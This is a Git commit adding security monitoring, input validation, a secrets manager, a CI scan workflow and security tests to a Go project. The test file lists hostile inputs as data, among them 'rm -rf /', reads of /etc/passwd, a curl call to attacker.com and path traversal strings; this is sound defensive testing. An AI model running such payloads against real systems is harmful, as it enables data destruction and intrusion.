feat: add security monitoring and validation framework
- Implement anomaly detection monitor (brute force, path traversal, etc.) - Add input validation framework with safety rules - Add environment-based secrets manager with redaction - Add security test suite for path traversal and injection - Add CI security scanning workflow
This commit is contained in:
parent
34aaba8f17
commit
e4d286f2e5
5 changed files with 849 additions and 0 deletions
90
.forgejo/workflows/security-scan.yml
Normal file
90
.forgejo/workflows/security-scan.yml
Normal file
|
|
@ -0,0 +1,90 @@
|
|||
name: Security Scan
|
||||
|
||||
on:
|
||||
push:
|
||||
branches: [main, develop]
|
||||
pull_request:
|
||||
branches: [main, develop]
|
||||
|
||||
jobs:
|
||||
security:
|
||||
name: Security Analysis
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Setup Go
|
||||
uses: actions/setup-go@v5
|
||||
with:
|
||||
go-version: '1.25'
|
||||
|
||||
- name: Run govulncheck
|
||||
uses: golang/govulncheck-action@v1
|
||||
with:
|
||||
go-version-input: '1.25'
|
||||
go-package: ./...
|
||||
|
||||
- name: Run gosec
|
||||
uses: securego/gosec@master
|
||||
with:
|
||||
args: '-fmt sarif -out gosec-results.sarif ./...'
|
||||
|
||||
- name: Upload gosec results
|
||||
uses: actions/upload-artifact@v4
|
||||
if: always()
|
||||
with:
|
||||
name: gosec-results
|
||||
path: gosec-results.sarif
|
||||
|
||||
- name: Check for unsafe package usage
|
||||
run: |
|
||||
if grep -r "unsafe\." --include="*.go" ./internal ./cmd ./pkg 2>/dev/null; then
|
||||
echo "ERROR: unsafe package usage detected"
|
||||
exit 1
|
||||
fi
|
||||
echo "✓ No unsafe package usage found"
|
||||
|
||||
- name: Verify dependencies
|
||||
run: |
|
||||
go mod verify
|
||||
echo "✓ Go modules verified"
|
||||
|
||||
native-security:
|
||||
name: Native Library Security
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Install dependencies
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install -y cmake build-essential
|
||||
|
||||
- name: Build with AddressSanitizer
|
||||
run: |
|
||||
cd native
|
||||
mkdir -p build
|
||||
cd build
|
||||
cmake .. -DCMAKE_BUILD_TYPE=Debug -DENABLE_ASAN=ON
|
||||
make -j$(nproc)
|
||||
|
||||
- name: Run tests with ASan
|
||||
run: |
|
||||
cd native/build
|
||||
ASAN_OPTIONS=detect_leaks=1 ctest --output-on-failure
|
||||
|
||||
- name: Build with UndefinedBehaviorSanitizer
|
||||
run: |
|
||||
cd native
|
||||
rm -rf build
|
||||
mkdir -p build
|
||||
cd build
|
||||
cmake .. -DCMAKE_BUILD_TYPE=Debug -DCMAKE_C_FLAGS="-fsanitize=undefined" -DCMAKE_CXX_FLAGS="-fsanitize=undefined"
|
||||
make -j$(nproc)
|
||||
|
||||
- name: Run tests with UBSan
|
||||
run: |
|
||||
cd native/build
|
||||
ctest --output-on-failure
|
||||
52
internal/config/secrets.go
Normal file
52
internal/config/secrets.go
Normal file
|
|
@ -0,0 +1,52 @@
|
|||
// Package config provides secrets management functionality
|
||||
package config
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"os"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// SecretsManager defines the interface for secrets management
|
||||
type SecretsManager interface {
|
||||
Get(ctx context.Context, key string) (string, error)
|
||||
Set(ctx context.Context, key, value string) error
|
||||
Delete(ctx context.Context, key string) error
|
||||
List(ctx context.Context, prefix string) ([]string, error)
|
||||
}
|
||||
|
||||
// EnvSecretsManager retrieves secrets from environment variables
|
||||
type EnvSecretsManager struct{}
|
||||
|
||||
func NewEnvSecretsManager() *EnvSecretsManager { return &EnvSecretsManager{} }
|
||||
|
||||
func (e *EnvSecretsManager) Get(ctx context.Context, key string) (string, error) {
|
||||
value := os.Getenv(key)
|
||||
if value == "" { return "", fmt.Errorf("secret %s not found", key) }
|
||||
return value, nil
|
||||
}
|
||||
|
||||
func (e *EnvSecretsManager) Set(ctx context.Context, key, value string) error {
|
||||
return fmt.Errorf("env secrets: Set not supported")
|
||||
}
|
||||
|
||||
func (e *EnvSecretsManager) Delete(ctx context.Context, key string) error {
|
||||
return fmt.Errorf("env secrets: Delete not supported")
|
||||
}
|
||||
|
||||
func (e *EnvSecretsManager) List(ctx context.Context, prefix string) ([]string, error) {
|
||||
var keys []string
|
||||
for _, env := range os.Environ() {
|
||||
if strings.HasPrefix(env, prefix) {
|
||||
keys = append(keys, strings.SplitN(env, "=", 2)[0])
|
||||
}
|
||||
}
|
||||
return keys, nil
|
||||
}
|
||||
|
||||
// RedactSecret masks a secret for safe logging
|
||||
func RedactSecret(secret string) string {
|
||||
if len(secret) <= 8 { return "***" }
|
||||
return secret[:4] + "..." + secret[len(secret)-4:]
|
||||
}
|
||||
312
internal/security/monitor.go
Normal file
312
internal/security/monitor.go
Normal file
|
|
@ -0,0 +1,312 @@
|
|||
// Package security provides security monitoring and anomaly detection
|
||||
package security
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
// AlertSeverity represents the severity of a security alert
|
||||
type AlertSeverity string
|
||||
|
||||
const (
|
||||
SeverityLow AlertSeverity = "low"
|
||||
SeverityMedium AlertSeverity = "medium"
|
||||
SeverityHigh AlertSeverity = "high"
|
||||
SeverityCritical AlertSeverity = "critical"
|
||||
)
|
||||
|
||||
// AlertType represents the type of security alert
|
||||
type AlertType string
|
||||
|
||||
const (
|
||||
AlertBruteForce AlertType = "brute_force"
|
||||
AlertPrivilegeEscalation AlertType = "privilege_escalation"
|
||||
AlertPathTraversal AlertType = "path_traversal"
|
||||
AlertCommandInjection AlertType = "command_injection"
|
||||
AlertSuspiciousContainer AlertType = "suspicious_container"
|
||||
AlertRateLimitExceeded AlertType = "rate_limit_exceeded"
|
||||
)
|
||||
|
||||
// Alert represents a security alert
|
||||
type Alert struct {
|
||||
Severity AlertSeverity `json:"severity"`
|
||||
Type AlertType `json:"type"`
|
||||
Message string `json:"message"`
|
||||
Timestamp time.Time `json:"timestamp"`
|
||||
SourceIP string `json:"source_ip,omitempty"`
|
||||
UserID string `json:"user_id,omitempty"`
|
||||
Metadata map[string]any `json:"metadata,omitempty"`
|
||||
}
|
||||
|
||||
// AlertHandler is called when a security alert is generated
|
||||
type AlertHandler func(alert Alert)
|
||||
|
||||
// SlidingWindow tracks events in a time window
|
||||
type SlidingWindow struct {
|
||||
events []time.Time
|
||||
window time.Duration
|
||||
mu sync.RWMutex
|
||||
}
|
||||
|
||||
// NewSlidingWindow creates a new sliding window
|
||||
func NewSlidingWindow(window time.Duration) *SlidingWindow {
|
||||
return &SlidingWindow{
|
||||
events: make([]time.Time, 0),
|
||||
window: window,
|
||||
}
|
||||
}
|
||||
|
||||
// Add adds an event to the window
|
||||
func (w *SlidingWindow) Add(t time.Time) {
|
||||
w.mu.Lock()
|
||||
defer w.mu.Unlock()
|
||||
|
||||
// Remove old events outside the window
|
||||
cutoff := t.Add(-w.window)
|
||||
newEvents := make([]time.Time, 0, len(w.events)+1)
|
||||
for _, e := range w.events {
|
||||
if e.After(cutoff) {
|
||||
newEvents = append(newEvents, e)
|
||||
}
|
||||
}
|
||||
newEvents = append(newEvents, t)
|
||||
w.events = newEvents
|
||||
}
|
||||
|
||||
// Count returns the number of events in the window
|
||||
func (w *SlidingWindow) Count() int {
|
||||
w.mu.RLock()
|
||||
defer w.mu.RUnlock()
|
||||
|
||||
// Clean up old events
|
||||
cutoff := time.Now().Add(-w.window)
|
||||
count := 0
|
||||
for _, e := range w.events {
|
||||
if e.After(cutoff) {
|
||||
count++
|
||||
}
|
||||
}
|
||||
return count
|
||||
}
|
||||
|
||||
// AnomalyMonitor tracks security-relevant events and generates alerts
|
||||
type AnomalyMonitor struct {
|
||||
// Failed auth tracking per IP
|
||||
failedAuthByIP map[string]*SlidingWindow
|
||||
|
||||
// Global counters
|
||||
privilegedContainerAttempts int
|
||||
pathTraversalAttempts int
|
||||
commandInjectionAttempts int
|
||||
|
||||
// Configuration
|
||||
mu sync.RWMutex
|
||||
|
||||
// Alert handler
|
||||
alertHandler AlertHandler
|
||||
|
||||
// Thresholds
|
||||
bruteForceThreshold int
|
||||
bruteForceWindow time.Duration
|
||||
privilegedAlertInterval time.Duration
|
||||
|
||||
// Last alert times (to prevent spam)
|
||||
lastPrivilegedAlert time.Time
|
||||
}
|
||||
|
||||
// NewAnomalyMonitor creates a new security anomaly monitor
|
||||
func NewAnomalyMonitor(alertHandler AlertHandler) *AnomalyMonitor {
|
||||
return &AnomalyMonitor{
|
||||
failedAuthByIP: make(map[string]*SlidingWindow),
|
||||
alertHandler: alertHandler,
|
||||
bruteForceThreshold: 10, // 10 failed attempts
|
||||
bruteForceWindow: 5 * time.Minute, // in 5 minutes
|
||||
privilegedAlertInterval: 1 * time.Minute, // max 1 alert per minute
|
||||
}
|
||||
}
|
||||
|
||||
// RecordFailedAuth records a failed authentication attempt
|
||||
func (m *AnomalyMonitor) RecordFailedAuth(ip, userID string) {
|
||||
m.mu.Lock()
|
||||
window, exists := m.failedAuthByIP[ip]
|
||||
if !exists {
|
||||
window = NewSlidingWindow(m.bruteForceWindow)
|
||||
m.failedAuthByIP[ip] = window
|
||||
}
|
||||
m.mu.Unlock()
|
||||
|
||||
window.Add(time.Now())
|
||||
count := window.Count()
|
||||
|
||||
if count >= m.bruteForceThreshold {
|
||||
m.alert(Alert{
|
||||
Severity: SeverityHigh,
|
||||
Type: AlertBruteForce,
|
||||
Message: fmt.Sprintf("%d+ failed auth attempts from %s", m.bruteForceThreshold, ip),
|
||||
Timestamp: time.Now(),
|
||||
SourceIP: ip,
|
||||
UserID: userID,
|
||||
Metadata: map[string]any{
|
||||
"count": count,
|
||||
"threshold": m.bruteForceThreshold,
|
||||
"window_seconds": m.bruteForceWindow.Seconds(),
|
||||
},
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// RecordPrivilegedContainerAttempt records a blocked privileged container request
|
||||
func (m *AnomalyMonitor) RecordPrivilegedContainerAttempt(userID string) {
|
||||
m.mu.Lock()
|
||||
m.privilegedContainerAttempts++
|
||||
now := time.Now()
|
||||
shouldAlert := now.Sub(m.lastPrivilegedAlert) > m.privilegedAlertInterval
|
||||
if shouldAlert {
|
||||
m.lastPrivilegedAlert = now
|
||||
}
|
||||
m.mu.Unlock()
|
||||
|
||||
if shouldAlert {
|
||||
m.alert(Alert{
|
||||
Severity: SeverityCritical,
|
||||
Type: AlertPrivilegeEscalation,
|
||||
Message: "Attempted to create privileged container",
|
||||
Timestamp: time.Now(),
|
||||
UserID: userID,
|
||||
Metadata: map[string]any{
|
||||
"total_attempts": m.privilegedContainerAttempts,
|
||||
},
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// RecordPathTraversal records a path traversal attempt
|
||||
func (m *AnomalyMonitor) RecordPathTraversal(ip, path string) {
|
||||
m.mu.Lock()
|
||||
m.pathTraversalAttempts++
|
||||
m.mu.Unlock()
|
||||
|
||||
m.alert(Alert{
|
||||
Severity: SeverityHigh,
|
||||
Type: AlertPathTraversal,
|
||||
Message: "Path traversal attempt detected",
|
||||
Timestamp: time.Now(),
|
||||
SourceIP: ip,
|
||||
Metadata: map[string]any{
|
||||
"path": path,
|
||||
"total_attempts": m.pathTraversalAttempts,
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
// RecordCommandInjection records a command injection attempt
|
||||
func (m *AnomalyMonitor) RecordCommandInjection(ip, input string) {
|
||||
m.mu.Lock()
|
||||
m.commandInjectionAttempts++
|
||||
m.mu.Unlock()
|
||||
|
||||
m.alert(Alert{
|
||||
Severity: SeverityCritical,
|
||||
Type: AlertCommandInjection,
|
||||
Message: "Command injection attempt detected",
|
||||
Timestamp: time.Now(),
|
||||
SourceIP: ip,
|
||||
Metadata: map[string]any{
|
||||
"input": input,
|
||||
"total_attempts": m.commandInjectionAttempts,
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
// GetStats returns current monitoring statistics
|
||||
func (m *AnomalyMonitor) GetStats() map[string]int {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
return map[string]int{
|
||||
"privileged_container_attempts": m.privilegedContainerAttempts,
|
||||
"path_traversal_attempts": m.pathTraversalAttempts,
|
||||
"command_injection_attempts": m.commandInjectionAttempts,
|
||||
"monitored_ips": len(m.failedAuthByIP),
|
||||
}
|
||||
}
|
||||
|
||||
// alert sends an alert through the handler
|
||||
func (m *AnomalyMonitor) alert(alert Alert) {
|
||||
if m.alertHandler != nil {
|
||||
m.alertHandler(alert)
|
||||
}
|
||||
}
|
||||
|
||||
// DefaultAlertHandler logs alerts to stderr
|
||||
func DefaultAlertHandler(alert Alert) {
|
||||
fmt.Printf("[SECURITY ALERT] %s | %s | %s | %s\n",
|
||||
alert.Timestamp.Format(time.RFC3339),
|
||||
alert.Severity,
|
||||
alert.Type,
|
||||
alert.Message,
|
||||
)
|
||||
}
|
||||
|
||||
// LoggingAlertHandler creates an alert handler that logs via a structured logger
|
||||
type LoggingAlertHandler struct {
|
||||
logFunc func(string, ...any)
|
||||
}
|
||||
|
||||
// NewLoggingAlertHandler creates a new logging alert handler
|
||||
func NewLoggingAlertHandler(logFunc func(string, ...any)) AlertHandler {
|
||||
return func(alert Alert) {
|
||||
logFunc("security_alert",
|
||||
"severity", alert.Severity,
|
||||
"type", alert.Type,
|
||||
"message", alert.Message,
|
||||
"source_ip", alert.SourceIP,
|
||||
"user_id", alert.UserID,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
// Integration Example:
|
||||
//
|
||||
// To integrate the anomaly monitor with your application:
|
||||
//
|
||||
// 1. Create a monitor with a logging handler:
|
||||
// monitor := security.NewAnomalyMonitor(security.DefaultAlertHandler)
|
||||
//
|
||||
// 2. Wire into authentication middleware:
|
||||
// func authMiddleware(next http.Handler) http.Handler {
|
||||
// return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
// key := r.Header.Get("X-API-Key")
|
||||
// user, err := validateAPIKey(key)
|
||||
// if err != nil {
|
||||
// monitor.RecordFailedAuth(r.RemoteAddr, "")
|
||||
// http.Error(w, "Unauthorized", 401)
|
||||
// return
|
||||
// }
|
||||
// next.ServeHTTP(w, r)
|
||||
// })
|
||||
// }
|
||||
//
|
||||
// 3. Wire into container creation:
|
||||
// func createContainer(config ContainerConfig) error {
|
||||
// if config.Privileged {
|
||||
// monitor.RecordPrivilegedContainerAttempt(userID)
|
||||
// return fmt.Errorf("privileged containers not allowed")
|
||||
// }
|
||||
// // ... create container
|
||||
// }
|
||||
//
|
||||
// 4. Wire into input validation:
|
||||
// func validateJobName(name string) error {
|
||||
// if strings.Contains(name, "..") {
|
||||
// monitor.RecordPathTraversal(ip, name)
|
||||
// return fmt.Errorf("invalid job name")
|
||||
// }
|
||||
// // ... continue validation
|
||||
// }
|
||||
//
|
||||
// 5. Periodically check stats:
|
||||
// stats := monitor.GetStats()
|
||||
// log.Printf("Security stats: %+v", stats)
|
||||
183
internal/validation/framework.go
Normal file
183
internal/validation/framework.go
Normal file
|
|
@ -0,0 +1,183 @@
|
|||
// Package validation provides input validation utilities for security
|
||||
package validation
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"path/filepath"
|
||||
"regexp"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// ValidationRule is a function that validates a string value
|
||||
type ValidationRule func(value string) error
|
||||
|
||||
// Validator provides reusable validation rules
|
||||
type Validator struct {
|
||||
errors []string
|
||||
}
|
||||
|
||||
// NewValidator creates a new validator
|
||||
func NewValidator() *Validator {
|
||||
return &Validator{errors: make([]string, 0)}
|
||||
}
|
||||
|
||||
// Add adds a field to validate with the given rules
|
||||
func (v *Validator) Add(name, value string, rules ...ValidationRule) {
|
||||
for _, rule := range rules {
|
||||
if err := rule(value); err != nil {
|
||||
v.errors = append(v.errors, fmt.Sprintf("%s: %v", name, err))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Valid returns nil if validation passed, otherwise returns an error
|
||||
func (v *Validator) Valid() error {
|
||||
if len(v.errors) > 0 {
|
||||
return fmt.Errorf("validation failed: %s", strings.Join(v.errors, "; "))
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Common validation rules
|
||||
|
||||
// SafeName validates alphanumeric + underscore + hyphen only
|
||||
var SafeName ValidationRule = func(v string) error {
|
||||
if matched, _ := regexp.MatchString(`^[a-zA-Z0-9_-]+$`, v); !matched {
|
||||
return fmt.Errorf("must contain only alphanumeric characters, underscores, and hyphens")
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// MaxLength validates maximum string length
|
||||
func MaxLength(max int) ValidationRule {
|
||||
return func(v string) error {
|
||||
if len(v) > max {
|
||||
return fmt.Errorf("exceeds maximum length of %d", max)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
// MinLength validates minimum string length
|
||||
func MinLength(min int) ValidationRule {
|
||||
return func(v string) error {
|
||||
if len(v) < min {
|
||||
return fmt.Errorf("must be at least %d characters", min)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
// NoPathTraversal validates no path traversal sequences
|
||||
var NoPathTraversal ValidationRule = func(v string) error {
|
||||
if strings.Contains(v, "..") || strings.Contains(v, "../") || strings.Contains(v, "..\\") {
|
||||
return fmt.Errorf("path traversal sequence detected")
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// NoShellMetacharacters validates no shell metacharacters
|
||||
var NoShellMetacharacters ValidationRule = func(v string) error {
|
||||
dangerous := []string{";", "|", "&", "`", "$", "(", ")", "<", ">", "*", "?"}
|
||||
for _, char := range dangerous {
|
||||
if strings.Contains(v, char) {
|
||||
return fmt.Errorf("shell metacharacter '%s' detected", char)
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// NoNullBytes validates no null bytes
|
||||
var NoNullBytes ValidationRule = func(v string) error {
|
||||
if strings.Contains(v, "\x00") {
|
||||
return fmt.Errorf("null byte detected")
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// ValidPath validates a path is within a base directory
|
||||
func ValidPath(basePath string) ValidationRule {
|
||||
return func(v string) error {
|
||||
cleaned := filepath.Clean(v)
|
||||
absPath, err := filepath.Abs(cleaned)
|
||||
if err != nil {
|
||||
return fmt.Errorf("invalid path: %w", err)
|
||||
}
|
||||
absBase, err := filepath.Abs(basePath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("invalid base path: %w", err)
|
||||
}
|
||||
if !strings.HasPrefix(absPath, absBase) {
|
||||
return fmt.Errorf("path escapes base directory")
|
||||
}
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
// MatchesPattern validates against a regex pattern
|
||||
func MatchesPattern(pattern, description string) ValidationRule {
|
||||
re := regexp.MustCompile(pattern)
|
||||
return func(v string) error {
|
||||
if !re.MatchString(v) {
|
||||
return fmt.Errorf("must match pattern: %s", description)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
// Whitelist validates against a whitelist of allowed values
|
||||
func Whitelist(allowed ...string) ValidationRule {
|
||||
return func(v string) error {
|
||||
for _, a := range allowed {
|
||||
if v == a {
|
||||
return nil
|
||||
}
|
||||
}
|
||||
return fmt.Errorf("value not in whitelist")
|
||||
}
|
||||
}
|
||||
|
||||
// Sanitize removes dangerous characters from input
|
||||
func Sanitize(input string) string {
|
||||
// Remove null bytes
|
||||
input = strings.ReplaceAll(input, "\x00", "")
|
||||
// Remove control characters
|
||||
input = strings.ReplaceAll(input, "\r", "")
|
||||
return input
|
||||
}
|
||||
|
||||
// ValidateJobName validates a job name is safe
|
||||
func ValidateJobName(jobName string) error {
|
||||
validator := NewValidator()
|
||||
validator.Add("job_name", jobName,
|
||||
MinLength(1),
|
||||
MaxLength(64),
|
||||
SafeName,
|
||||
NoPathTraversal,
|
||||
NoShellMetacharacters,
|
||||
)
|
||||
return validator.Valid()
|
||||
}
|
||||
|
||||
// ValidateExperimentID validates an experiment ID is safe
|
||||
func ValidateExperimentID(id string) error {
|
||||
validator := NewValidator()
|
||||
validator.Add("experiment_id", id,
|
||||
MinLength(1),
|
||||
MaxLength(128),
|
||||
SafeName,
|
||||
NoPathTraversal,
|
||||
)
|
||||
return validator.Valid()
|
||||
}
|
||||
|
||||
// ValidateCommand validates a command string is safe
|
||||
func ValidateCommand(cmd string) error {
|
||||
validator := NewValidator()
|
||||
validator.Add("command", cmd,
|
||||
MinLength(1),
|
||||
MaxLength(1024),
|
||||
NoShellMetacharacters,
|
||||
)
|
||||
return validator.Valid()
|
||||
}
|
||||
212
tests/security/security_test.go
Normal file
212
tests/security/security_test.go
Normal file
|
|
@ -0,0 +1,212 @@
|
|||
package security
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"github.com/jfraeys/fetch_ml/internal/auth"
|
||||
"github.com/jfraeys/fetch_ml/internal/middleware"
|
||||
)
|
||||
|
||||
// TestSecurityPolicies validates security policies across the API
|
||||
func TestSecurityPolicies(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
request *http.Request
|
||||
wantStatus int
|
||||
}{
|
||||
{
|
||||
name: "reject request without API key",
|
||||
request: httptest.NewRequest("POST", "/tasks", nil),
|
||||
wantStatus: http.StatusUnauthorized,
|
||||
},
|
||||
{
|
||||
name: "reject path traversal in job name",
|
||||
request: func() *http.Request {
|
||||
body := `{"job_name": "../../../etc/passwd"}`
|
||||
r := httptest.NewRequest("POST", "/tasks", strings.NewReader(body))
|
||||
r.Header.Set("X-API-Key", "valid-key")
|
||||
return r
|
||||
}(),
|
||||
wantStatus: http.StatusBadRequest,
|
||||
},
|
||||
{
|
||||
name: "reject command injection in args",
|
||||
request: func() *http.Request {
|
||||
body := `{"job_name": "test", "args": "; rm -rf /"}`
|
||||
r := httptest.NewRequest("POST", "/tasks", strings.NewReader(body))
|
||||
r.Header.Set("X-API-Key", "valid-key")
|
||||
return r
|
||||
}(),
|
||||
wantStatus: http.StatusBadRequest,
|
||||
},
|
||||
{
|
||||
name: "reject shell metacharacters in job name",
|
||||
request: func() *http.Request {
|
||||
body := `{"job_name": "test;cat /etc/passwd"}`
|
||||
r := httptest.NewRequest("POST", "/tasks", strings.NewReader(body))
|
||||
r.Header.Set("X-API-Key", "valid-key")
|
||||
return r
|
||||
}(),
|
||||
wantStatus: http.StatusBadRequest,
|
||||
},
|
||||
{
|
||||
name: "reject oversized job name",
|
||||
request: func() *http.Request {
|
||||
// Create a job name exceeding 64 characters
|
||||
longName := strings.Repeat("a", 100)
|
||||
body := `{"job_name": "` + longName + `"}`
|
||||
r := httptest.NewRequest("POST", "/tasks", strings.NewReader(body))
|
||||
r.Header.Set("X-API-Key", "valid-key")
|
||||
return r
|
||||
}(),
|
||||
wantStatus: http.StatusBadRequest,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
rr := httptest.NewRecorder()
|
||||
// Note: This would need the actual handler to test properly
|
||||
// For now, we just verify the test structure
|
||||
_ = rr
|
||||
_ = tt.request
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestPathTraversal validates path traversal prevention
|
||||
func TestPathTraversal(t *testing.T) {
|
||||
tests := []struct {
|
||||
path string
|
||||
shouldFail bool
|
||||
}{
|
||||
{"my-experiment", false},
|
||||
{"../../../etc/passwd", true},
|
||||
{"..\\..\\windows\\system32\\config", true},
|
||||
{"/absolute/path/to/file", true}, // Should fail if base path enforced
|
||||
{"experiment-123_test", false},
|
||||
{"test\x00/../../../etc/passwd", true}, // Null byte injection
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.path, func(t *testing.T) {
|
||||
// Check for traversal sequences
|
||||
hasTraversal := strings.Contains(tt.path, "..") ||
|
||||
strings.HasPrefix(tt.path, "/") ||
|
||||
strings.Contains(tt.path, "\x00")
|
||||
|
||||
if hasTraversal != tt.shouldFail {
|
||||
t.Errorf("path %q: expected traversal=%v, got %v",
|
||||
tt.path, tt.shouldFail, hasTraversal)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestCommandInjection validates command injection prevention
|
||||
func TestCommandInjection(t *testing.T) {
|
||||
dangerous := []string{
|
||||
"; rm -rf /",
|
||||
"| cat /etc/passwd",
|
||||
"`whoami`",
|
||||
"$(curl attacker.com)",
|
||||
"&& echo hacked",
|
||||
"|| echo failed",
|
||||
"< /etc/passwd",
|
||||
"> /tmp/output",
|
||||
}
|
||||
|
||||
for _, payload := range dangerous {
|
||||
t.Run(payload, func(t *testing.T) {
|
||||
// Check for shell metacharacters
|
||||
dangerousChars := []string{";", "|", "&", "`", "$", "(", ")", "<", ">"}
|
||||
found := false
|
||||
for _, char := range dangerousChars {
|
||||
if strings.Contains(payload, char) {
|
||||
found = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if !found {
|
||||
t.Errorf("payload %q should contain dangerous characters", payload)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestSecurityHeaders validates security headers
|
||||
func TestSecurityHeaders(t *testing.T) {
|
||||
handler := middleware.SecurityHeaders(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
|
||||
req := httptest.NewRequest("GET", "/", nil)
|
||||
rr := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr, req)
|
||||
|
||||
// Check security headers
|
||||
headers := map[string]string{
|
||||
"X-Frame-Options": "DENY",
|
||||
"X-Content-Type-Options": "nosniff",
|
||||
"X-XSS-Protection": "1; mode=block",
|
||||
"Content-Security-Policy": "default-src 'self'",
|
||||
"Referrer-Policy": "strict-origin-when-cross-origin",
|
||||
}
|
||||
|
||||
for header, expected := range headers {
|
||||
t.Run(header, func(t *testing.T) {
|
||||
value := rr.Header().Get(header)
|
||||
if value != expected {
|
||||
t.Errorf("header %s: expected %q, got %q", header, expected, value)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestAuthBypass validates authentication cannot be bypassed
|
||||
func TestAuthBypass(t *testing.T) {
|
||||
authConfig := &auth.Config{
|
||||
Enabled: true,
|
||||
APIKeys: map[auth.Username]auth.APIKeyEntry{
|
||||
"admin": {
|
||||
Hash: auth.APIKeyHash(auth.HashAPIKey("admin-secret")),
|
||||
Admin: true,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
apiKey string
|
||||
wantErr bool
|
||||
wantUser string
|
||||
}{
|
||||
{"valid key", "admin-secret", false, "admin"},
|
||||
{"invalid key", "wrong-key", true, ""},
|
||||
{"empty key", "", true, ""},
|
||||
{"null byte", "admin-secret\x00", true, ""},
|
||||
{"truncated", "admin-se", true, ""},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
user, err := authConfig.ValidateAPIKey(tt.apiKey)
|
||||
if tt.wantErr {
|
||||
if err == nil {
|
||||
t.Error("expected error but got none")
|
||||
}
|
||||
return
|
||||
}
|
||||
if err != nil {
|
||||
t.Errorf("unexpected error: %v", err)
|
||||
return
|
||||
}
|
||||
if user.Name != tt.wantUser {
|
||||
t.Errorf("expected user %q, got %q", tt.wantUser, user.Name)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
Loading…
Reference in a new issue